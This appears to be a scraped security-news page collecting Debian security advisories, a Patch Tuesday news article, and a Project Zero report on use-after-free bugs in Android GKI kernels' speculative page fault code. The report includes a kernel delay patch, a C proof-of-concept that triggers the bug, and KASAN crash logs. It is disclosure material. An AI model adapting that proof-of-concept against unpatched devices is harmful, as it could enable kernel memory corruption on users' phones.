Debian Linux Security Advisory 5787-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5787-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 09, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-9602 CVE-2024-9603Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.100-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcGuh0ACgkQZF0CR8NudjdP/w/6Apzn8iDKtKPttv+lXU07odw69w18PpHAhgCDgBBScoPM2caX/aBqL0yn8cHZf/aviZVocGgBHgqOn24TAdn8dv0chqpL6wGVumrEMiCuZC6cUFoKZpreembZMKjOFaYYWwKGq1abB65h043lYj5nbpKYKbYpy7sj+foyuTvY9n/d+Lb9L8TMSYqyo4wp+maehWy1aG5KwqSw2tKzKWef6txBxOD7HJ+2M2mG7Ml2d8YR8mxrCGupZCSLay4z8Hf6v0rQh7Xg7X9iAnnrJklmIAoXyV7oKXuE62lo0ElfJ3pyGZh7Ks/nxpp+Z2Vk7XK95EMlnre2FNell6Ut7IMBxFjKBh+QF4SVoe2vqBsiU/yryQrL12bbCIQvGijMfnSd+7j4XklD0zTfaSziWxeX4RXXH31YGbEkAtCcv+TldnTX5qmNp6wAG5H5JFafZ5P+bQ8+AO6WYlUAFPDG6GeWOPjGSZzAJKDzYIT3Yvw9zZKGgWQn1OXLCle2sXOU3d6rKnL0tOqAObEZydINE2YlTo7W23MbFNqqgQQS6I0iQZn1tL34rZacxKVhHTSikiat7p3p5o9RN+e7mA+kvh9ot113e1Ri14k7vyEYzlZp0Rt4vZtifnavtkVWPpPCG26NAQDIuPpCeM/dUJYs0nDqZe5Mce7qMcm68+vTMr34z00==QEGj-----END PGP SIGNATURE-----

Debian Security Advisory 5787-1

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to use-after-free conditions.

    A central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are"Speculative page faults (SPF)"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.If you run MM code that has not been through the fuzzing, testing and reviewthat committed upstream code gets, there's a higher chance of undiscoveredbugs.B) The SPF patches **change the rules** that MM code has to follow, so nowAndroid's version of MM has different rules than upstream MM.This means that any patches in vaguely related parts of upstream MM need tobe checked by an Android engineer to see if they conflict with Android'sspecial rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):    handle_pte_fault() calls pmd_none() without protection against concurrent    page table deletion, leading to UAF read.    do_anonymous_page() calls pte_alloc() without protection against concurrent    page table deletion, leading to UAF write.    do_anonymous_page() calls pmd_trans_unstable() without protection against    concurrent page table deletion, leading to UAF read.    do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates    on a page table without protection against concurrent page table deletion,    leading to use-after-union-change read+write in struct page (on the page    table lock) and use-after-free read of a page table entry (resulting in bogus    page* calculation)    do_wp_page() calls handle_userfault() without protection against concurrent    userfaultfd_release(), leading to UAF reads of some flags from    userfaultfd_ctx.    I think back when the SPF series was posted upstream, there might have been    sufficient protection against this (because ___handle_speculative_fault()    bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd    support was added, and ___handle_speculative_fault() doesn't bail on    VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses    userfaultfd_pte_wp() which reads flags from the VMA.    The way seqcounts are used to detect concurrent writers looks wrong.    The seqcount API requires that only one writer at a time can be in a    vm_write_begin() / vm_write_end() section, but these helpers are used in    codepaths that only hold the mmap lock in shared mode, so there can be    concurrent writers.    As far as I can tell, this means that when there are an even number of    concurrent writers, it will look as if there are no active writers.    This probably doesn't have much security impact because all of the places    that do vm_write_begin() where concurrency would be an actual problem seem to    hold the mmap lock in exclusive mode?As an example, I tested https://crbug.com/project-zero/2. To reproduce this easily, I patched an extradelay into the kernel:diff --git a/mm/memory.c b/mm/memory.c  index 83b715ed65775..35ce412d0a965 100644  --- a/mm/memory.c  +++ b/mm/memory.c  @@ -84,6 +84,8 @@   #include <asm/tlb.h>   #include <asm/tlbflush.h>     +#include <linux/delay.h>  +   #include "pgalloc-track.h"   #include "internal.h"     @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault \*vmf)          vm_fault_t ret = 0;          pte_t entry;     +       if (strcmp(current->comm, "SLOWME") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {  +               pr_warn("%s: BEGIN DELAY 0x%lx\n", __func__, vmf->address);  +               mdelay(2000);  +               pr_warn("%s: END DELAY 0x%lx\n", __func__, vmf->address);  +       }  +          /\* File mapping without ->vm_ops ? \*/          if (vmf->vma_flags & VM_SHARED)                  return VM_FAULT_SIGBUS;  Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:#define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <unistd.h>  #include <sys/prctl.h>  #include <sys/mman.h>    // basic idea:  // delete the 1G-covering page table while do_anonymous_page() is at its entry  // point    #define VMA_ADDR ((void\*)0x40000000UL)  #define VMA_SIZE (0x40000000UL)    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    static void \*thread_fn(void \*dummy) {    SYSCHK(prctl(PR_SET_NAME, "SLOWME"));    \*(volatile char \*)VMA_ADDR;    SYSCHK(prctl(PR_SET_NAME, "spfthread"));  }    int main(void) {    SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                          MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));    SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));    // create anon_vma and page tables    \*(volatile char \*)(VMA_ADDR+0x1000) = 1;      pthread_t thread;    if (pthread_create(&thread, NULL, thread_fn, NULL))      errx(1, "pthread_create");      sleep(1);    munmap(VMA_ADDR, VMA_SIZE);      if (pthread_join(thread, NULL))      errx(1, "pthread_join");    return 0;  }  This first results in a UAF read of a PTE:do_anonymous_page: BEGIN DELAY 0x40000000  do_anonymous_page: END DELAY 0x40000000  ==================================================================  BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   Read of size 8 at addr ffff88800f358000 by task SLOWME/724    CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014  Call Trace:  dump_stack_lvl (lib/dump_stack.c:120)   [...]  print_address_description.constprop.0 (mm/kasan/report.c:257)   [...]  [...]  kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460)   [...]  handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   [...]  ___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106)   [...]  __handle_speculative_fault (mm/memory.c:5148)   [...]  do_user_addr_fault (arch/x86/mm/fault.c:1320)   [...]  exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518)   [...]  asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571)   RIP: 0033:0x55d52bfe41fb  Then pte_alloc() tries to lock the page table entry:BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112)   Read of size 4 at addr ffff88801a730004 by task SLOWME/724  and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Discovered By jannh

Android GKI Kernels Use-After-Free

Debian Linux Security Advisory 5729-2 - The fixes for CVE-2024-38474 and CVE-2024-39884 introduced two regressions in mod_rewrite and mod_proxy.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5729-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 08, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : apache2  
Debian Bug     : 1079172 1079206

The fixes for CVE-2024-38474 and CVE-2024-39884 introduced two  
regressions in mod_rewrite and mod_proxy.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.4.62-1~deb12u2.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/apache2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcFlPAACgkQEMKTtsN8  
TjYXsBAAmEc/DBZN7SjocvWn5mSLFhHmn5amtaEYfQrmkvS6bDWIGK91ezydYmGW  
CqvkIanyCPmx1d79kSlwGySNRxK1bb0JYhgblN6nwV7DlCqL08xELh1zn94nx8HG  
v0YhrHN769P44weq96x/84lc+PImolKv8UB6CkJX5OvcSoDV01XtxvX4ynWsAoUd  
9N7yB6MZL+6znCY08TLvuVE/5bDfXuM/u0sabIvuSRbrVVuShmznmeXbuULAc9y7  
POfmXCAdMM0znyM+ZxxLO9ou9bUP2kJJvRT+M8mo872s/8bbUmRPPkw+SNWFcJTV  
ShcWze2fh27B7Rpd3yCrItqXZwoojQUKX4lsYbk6BVy4RLWEuyeLB9Mhm23tO0uO  
8jYGEbgD/6vnhVTsIpVCKMiv3Q0IPvrUQnkF3LKxtoiVolgkcpzAU3q9ZtFfHAjJ  
8dhIe2GyUJaJ6Ajnl14n1ffycNdc1giKNlNsoFFphEFyvuQIu3Bf+IajDHIN41JQ  
h379u0znHIE53P1O6rhKG1F9j7SYq1FKkKgdqgjXGXnbYV9uBnpg2bWX9ilCDiYm  
i+rWI3CRBVDt7tuTt0M1z6PF1GV44thrTDTjT8TTc8VsNDcCdZHWWHw2PVzRpA3R  
/9OFQH8icMPs1Z/xPychUn0VSO+Iijp2qFT1/IlqUu7LoFdTz80=  
=tQ62  
-----END PGP SIGNATURE-----

Debian Security Advisory 5729-2

Microsoft has released security updates to fix a total of 118 vulnerabilities across its software portfolio, two of which have come under active exploitation in the wild.
Of the 118 flaws, three are rated Critical, 113 are rated Important, and two are rated Moderate in severity. The Patch Tuesday update doesn't include the 25 additional flaws that the tech giant addressed in its Chromium-based

Microsoft has released security updates to fix a total of 118 vulnerabilities across its software portfolio, two of which have come under active exploitation in the wild.

Of the 118 flaws, three are rated Critical, 113 are rated Important, and two are rated Moderate in severity. The Patch Tuesday update doesn't include the 25 additional flaws that the tech giant addressed in its Chromium-based Edge browser over the past month.

Five of the vulnerabilities are listed as publicly known at the time of release, with two of them coming under active exploitation as a zero-day -

*   **CVE-2024-43572** (CVSS score: 7.8) - Microsoft Management Console Remote Code Execution Vulnerability (Exploitation detected)
*   **CVE-2024-43573** (CVSS score: 6.5) - Windows MSHTML Platform Spoofing Vulnerability (Exploitation Detected)
*   **CVE-2024-43583** (CVSS score: 7.8) - Winlogon Elevation of Privilege Vulnerability
*   **CVE-2024-20659** (CVSS score: 7.1) - Windows Hyper-V Security Feature Bypass Vulnerability
*   **CVE-2024-6197** (CVSS score: 8.8) - Open Source Curl Remote Code Execution Vulnerability (non-Microsoft CVE)

It's worth noting that CVE-2024-43573 is similar to CVE-2024-38112 and CVE-2024-43461, two other MSHTML spoofing flaws that have been exploited prior to July 2024 by the Void Banshee threat actor to deliver the Atlantida Stealer malware.

Microsoft makes no mention of how the two vulnerabilities are exploited in the wild, and by whom, or how widespread they are. It credited researchers Andres and Shady for reporting CVE-2024-43572, but no acknowledgment has been given for CVE-2024-43573, raising the possibility that it could be a case of patch bypass.

"Since the discovery of CVE-2024-43572, Microsoft now prevents untrusted MSC files from being opened on a system," Satnam Narang, senior staff research engineer at Tenable, said in a statement shared with The Hacker News.

The active exploitation of CVE-2024-43572 and CVE-2024-43573 has also been noted by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), which added them to its Known Exploited Vulnerabilities (KEV) catalog, requiring federal agencies to apply the fixes by October 29, 2024.

Among all the flaws disclosed by Redmond on Tuesday, the most severe concerns a remote execution flaw in Microsoft Configuration Manager (CVE-2024-43468, CVSS score: 9.8) that could allow unauthenticated actors to run arbitrary commands.

"An unauthenticated attacker could exploit this vulnerability by sending specially crafted requests to the target environment which are processed in an unsafe manner enabling the attacker to execute commands on the server and/or underlying database," it said.

Two other Critical-rated severity flaws also relate to remote code execution in Visual Studio Code extension for Arduino (CVE-2024-43488, CVSS score: 8.8) and Remote Desktop Protocol (RDP) Server (CVE-2024-43582, CVSS score: 8.1).

"Exploitation requires an attacker to send deliberately-malformed packets to a Windows RPC host, and leads to code execution in the context of the RPC service, although what this means in practice may depend on factors including RPC Interface Restriction configuration on the target asset," Adam Barnett, lead software engineer at Rapid7, told about CVE-2024-43582.

"One silver lining: attack complexity is high, since the attacker must win a race condition to access memory improperly."

**Software Patches from Other Vendors**

Outside of Microsoft, security updates have also been released by other vendors over the past few weeks to rectify several vulnerabilities, including —

*   Adobe
*   Amazon Web Services
*   Apache Avro
*   Apple
*   AutomationDirect
*   Bosch
*   Broadcom (including VMware)
*   Cisco (including Splunk)
*   Citrix
*   CODESYS
*   Dell
*   Draytek
*   Drupal
*   F5
*   Fortinet
*   GitLab
*   Google Android
*   Google Chrome
*   Google Cloud
*   Hitachi Energy
*   HP
*   HP Enterprise (including Aruba Networks)
*   IBM
*   Intel
*   Ivanti
*   Jenkins
*   Juniper Networks
*   Lenovo
*   Linux distributions Amazon Linux, Debian, Oracle Linux, Red Hat, Rocky Linux, SUSE, and Ubuntu
*   MediaTek
*   Mitsubishi Electric
*   MongoDB
*   Mozilla Firefox, Firefox ESR, and Thunderbird
*   NVIDIA
*   Okta
*   Palo Alto Networks
*   Progress Software
*   QNAP
*   Qualcomm
*   Rockwell Automation
*   Salesforce Tableau
*   Samsung
*   SAP
*   Schneider Electric
*   Siemens
*   Sophos
*   Synology
*   Trend Micro
*   Veritas
*   Zoom, and
*   Zyxel

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Issues Security Update Fixing 118 Flaws, Two Actively Exploited in the Wild

Debian Linux Security Advisory 5786-1 - Integer overflows flaws were discovered in the Compound Document Binary File format parser of libgsf, the GNOME Project G Structured File Library, which could result in the execution of arbitrary code if a specially crafted file is processed.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5786-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 05, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libgsfCVE ID         : CVE-2024-36474 CVE-2024-42415Debian Bug     : 1084056Integer overflows flaws were discovered in the Compound Document BinaryFile format parser of libgsf, the GNOME Project G Structured FileLibrary, which could result in the execution of arbitrary code if aspecially crafted file is processed.For the stable distribution (bookworm), these problems have been fixed inversion 1.14.50-1+deb12u1.We recommend that you upgrade your libgsf packages.For the detailed security status of libgsf please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/libgsfFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmcBlPdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0S1cBAAga89kJH98e3ECM9RQaRFdnSpo9qWrxfJF+hGzsaXnZzzfD8yRNUj1YT6ZXspu8wwMdc593UlZkZ4jg51LXUwqLoFRpLXObZ0wEoDQh17zLnQ4+lyY3ME1cTwOlGqVdrFR2/Pg16jDGCreA4T5HkTRArthvdg03iiR/9LtQ3564Z5c+VJnx31tH1uf7tgNcdSy4QEdFnpyMqSz0Exc8aIjWQSLxQju40jpfc3im++KYBk8kDr2gX/gilcxQIKBURNyzq1UfwF/dYqmv0ZYRnrEmLhlD346HnD4gGv8t41nRnQsgolCRV7lI8HkjJNChPSSM6K33bTv9KL0Cu31rN4CDzTyEsbLCoKo40jrdHVaTXlszM2GC6Wgu17n5NlFibqU35Y3NitBm6L1EEkyakDB0rWONXMJ/BOdCpqVIzgtY/Vq98RJb8tP112a0cyG9ffBBgnRZMUrKo0mKrU4A3+RUStQQahx1ECqAbYpqL+lU7ZXKHm9B7jgU+Dy/VESuQRYIOmA0I6jIvuRmGXGWJ+nVBkubshFmnpEO2JEPMzGxXLAieNcXApvdcseXRbUNLthPxsuEmHyC7XaUt9ADc56+tq7jopoIyB7Tui3lw3H/6fL9GPMhsjZAeL1GZN+jq99G7ZdyHHiRUn/Lu/hRdy9rC4WPHJ65a49iRjhi/c69g==pubk-----END PGP SIGNATURE-----

Debian Security Advisory 5786-1

Debian Linux Security Advisory 5785-1 - Dom Walden discovered that the AbuseFilter extension in MediaWiki, a website engine for collaborative work, performed incomplete authorisation checks.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5785-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 05, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : mediawikiCVE ID         : CVE-2024-47913Dom Walden discovered that the AbuseFilter extension in MediaWiki, awebsite engine for collaborative work, performed incomplete authorisationchecks.For the stable distribution (bookworm), this problem has been fixed inversion 1:1.39.10-1~deb12u1.We recommend that you upgrade your mediawiki packages.For the detailed security status of mediawiki please refer toits security tracker page at:https://security-tracker.debian.org/tracker/mediawikiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcBfMEACgkQEMKTtsN8TjbSyRAAquV+ePBJ2hoYLTNvZnz8yRbNsNaW8lqLY/LhN/lzmloAvV62gyEyYi+pQbp+tCyT258cSwzLz6aT2H0/X276PiWGIV+BTzVevejFQWWh1RCfnRRh9cTPZRTT2EW/IDSraotXyb6B/oKIIdJerY8mr7ZZaMFr34mLGH5q+oAYJYt1g/LQVO+y/SQxBtSgDNmShKQnre3M+8UH7tAW2ewq+RAAZu55Nr5ChgGjzidP3DciDH7JZt4jyMNlEVyn4smpvisEtM4B+WeMCX/LhYHwXtrakywZfEAAcbYqrto3dqbapFSqaA+6g4ru96DtYLY0IDQI55IVPi6J0hB5N/5ezXjwnHz4N7OQCU+MtpcuYfbY0KlpJcO3/q2o9lK/1m2O0jsKYMjGrW3E4lvmB44rZIDEWts0UsqJZy9pef3ucu4FZOSbv7po8B/A4MFPZ/asow2wYG1MIWYB3kL+LkuyzBXKDLbkJ03mwp7E7NmKi823ICUu3gVZzaeUkm/tKtB6Xmumr39CtXy+gAiH2gnIytlrpNHz3FAeluk1WYfV88SaDPuPnSI0U2QzTLUuQY72tCEgN8JGtGYs6TqtJq2yWsIyvQ+Ax10q2zXYZO8IZBtYf/etpPz47Mulcx4AOAiDwJ1+Lplr1006IZXrBkxxyo/veqmz5rjZym4G7Vh93l0==m9Jl-----END PGP SIGNATURE-----

Debian Security Advisory 5785-1

Debian Linux Security Advisory 5784-1 - Fabian Vogt reported that the PAM module in oath-toolkit, a collection of components to build one-time password authentication systems, does not safely perform file operations in users's home directories when using the usersfile feature (allowing to place the OTP state in the home directory of the to-be-authenticated user). A local user can take advantage of this flaw for root privilege escalation.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5784-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoOctober 04, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : oath-toolkitCVE ID         : CVE-2024-47191Fabian Vogt reported that the PAM module in oath-toolkit, a collectionof components to build one-time password authentication systems, doesnot safely perform file operations in users's home directories whenusing the usersfile feature (allowing to place the OTP state in the homedirectory of the to-be-authenticated user). A local user can takeadvantage of this flaw for root privilege escalation.For the stable distribution (bookworm), this problem has been fixed inversion 2.6.7-3.1+deb12u1.We recommend that you upgrade your oath-toolkit packages.For the detailed security status of oath-toolkit please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/oath-toolkitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmcAPvdfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0Th1A/9HWbGPaDbzOAbloBMyigtmxsGRlRI/yw/7zP1Ay37cgYd79nQyXrrjNAgrBqBVDJEm/X6xSApPLiJ3RuRPvExx4cW0n5HgSV86XwXckeid/JiBIC0CvH8C/482JgsYP8oxf1c6q5HU66uZApD93YjxcA59voxqmHDgzGm5DazakShQhKb7KOqvATx75CbDhUp5H1xskGTWiyZJuAljqstFm3DD/JCYWm7XEFkinF/l832S8CKrehchM+ZpcwGlxf4vZxyll+AHZMPomgmts7kf1AJi95mgzgxCsnT5tm1yl9M0kEZIArKm8BXw8gA6ZM7+Y+hbiDiHQGpWCxdBAvIwZ1nH6lAhU5aERgXoehUS6wzuZlVZ010er9ff/mPsyeQm35+TeRhIFlk7zk1b79ct0h+hOeaiqczXox9wFuZAZcuJuZnHXcV5TiJ8tGH9fXM25GmvTbWJ2YRHmo6k2+vR0XyksRcjQFLAhw21b265aSPkPDCVJZgs5pLpdmpM84N6Y0yZTrNR8mvCnSOiSMDcDf2nqn4jxPKkKpRp8JNtYlJSPOFGuKzSNKXzMdMnZ4EkXpDpCiP8unz7xWzCf19FhtHHJo2Zn2wKmOTWeLSQ3oCjGsdpn/MWb+t5P9A0fJ8v8vPXyKfyy/5owAlvkWmvyihNlxezEStNxdYx/sKn/U==iccV-----END PGP SIGNATURE-----

Debian Security Advisory 5784-1

Debian Linux Security Advisory 5783-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5783-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 04, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : firefox-esr  
CVE ID         : CVE-2024-9392 CVE-2024-9393 CVE-2024-9394 CVE-2024-9401

Multiple security issues have been found in the Mozilla Firefox  
web browser, which could potentially result in the execution  
of arbitrary code.

Debian follows the extended support releases (ESR) of Firefox.  
Starting with this update we're now following the 128.x releases.

Between 115.x and 128.x, Firefox has seen a number of feature  
updates. For more information please refer to  
https://www.mozilla.org/en-US/firefox/128.0esr/releasenotes/

For the stable distribution (bookworm), these problems have been fixed in  
version 128.3.0esr-1~deb12u1.

We recommend that you upgrade your firefox-esr packages.

For the detailed security status of firefox-esr please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/firefox-esr

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcANaYACgkQEMKTtsN8  
TjbVTxAAiGB8YD+VvINzF3/vvN1QMf5RT0QqmEtawGI+SWCWClfzT1zqPTvKDNId  
vAo5r/h1GsGNP+GwEqQu3GTn6GUsX6lzXidxtt3OCleWDzPIZCcFEJLRkvyzus0n  
cERDOEw77EQ63gQcduJvCt0ZClOVzaOgY+9m8IdkZK+n7WPKse/Ey6dI/A+//d5J  
gszktzRrIYNs+09X3yfmeJB1yn3oELNLGiL0KMmJ0Ck2+QToPKIz5wh0jMtirNuV  
pKMdM8sWkqPyKElTvoRvcDMpXW+cySaQyZlDWy2P9JdYJlm6HBHzLNE0TQbtrJmq  
IGK2XABgBn4QtDie+7OJk/QYm3sRpJotIWUrrYp5h3ZYK8p3nBpGKE/OBqNLlERQ  
TJCm8jT+pkHRhk1dJtbH3q30qjv5J0WY58a9GWGshh8JG+itPf/NHyMLE9aKoX+2  
/iDfjU8ENJcGXWBDxW2qu6KX4pkSKEkq5g/3M9Z6GG5Iucnw30On+DWxsTSGT6Ur  
8oIpRkrLL2nTx1FPUSz8cYH0GK7yDWRf4v+uEr93wDZhKkqIEiF+grRvom1s9bti  
ptgA7Thwm3r8dJvDQM01RCeNwRMRrkGBP1l/cWHZ0CBEJqEq3JS93pE7M9PDd/Jr  
MEm86whIZWHq6N3ql0fC1ATrALfvyVvQZFdjXFF5VUu1WbMRpDI=  
=0Mtj  
-----END PGP SIGNATURE-----

Debian Security Advisory 5783-1

Debian Linux Security Advisory 5782-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5782-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
October 03, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-31083 CVE-2024-27017 CVE-2024-35937 CVE-2024-35943  
                 CVE-2024-35966 CVE-2024-40972 CVE-2024-41016 CVE-2024-41096  
                 CVE-2024-41098 CVE-2024-42228 CVE-2024-42314 CVE-2024-43835  
                 CVE-2024-43859 CVE-2024-43884 CVE-2024-43892 CVE-2024-44931  
                 CVE-2024-44938 CVE-2024-44939 CVE-2024-44940 CVE-2024-44946  
                 CVE-2024-44947 CVE-2024-44974 CVE-2024-44977 CVE-2024-44982  
                 CVE-2024-44983 CVE-2024-44985 CVE-2024-44986 CVE-2024-44987  
                 CVE-2024-44988 CVE-2024-44989 CVE-2024-44990 CVE-2024-44991  
                 CVE-2024-44995 CVE-2024-44998 CVE-2024-44999 CVE-2024-45000  
                 CVE-2024-45002 CVE-2024-45003 CVE-2024-45006 CVE-2024-45007  
                 CVE-2024-45008 CVE-2024-45009 CVE-2024-45010 CVE-2024-45011  
                 CVE-2024-45016 CVE-2024-45018 CVE-2024-45019 CVE-2024-45021  
                 CVE-2024-45022 CVE-2024-45025 CVE-2024-45026 CVE-2024-45028  
                 CVE-2024-45029 CVE-2024-46673 CVE-2024-46674 CVE-2024-46675  
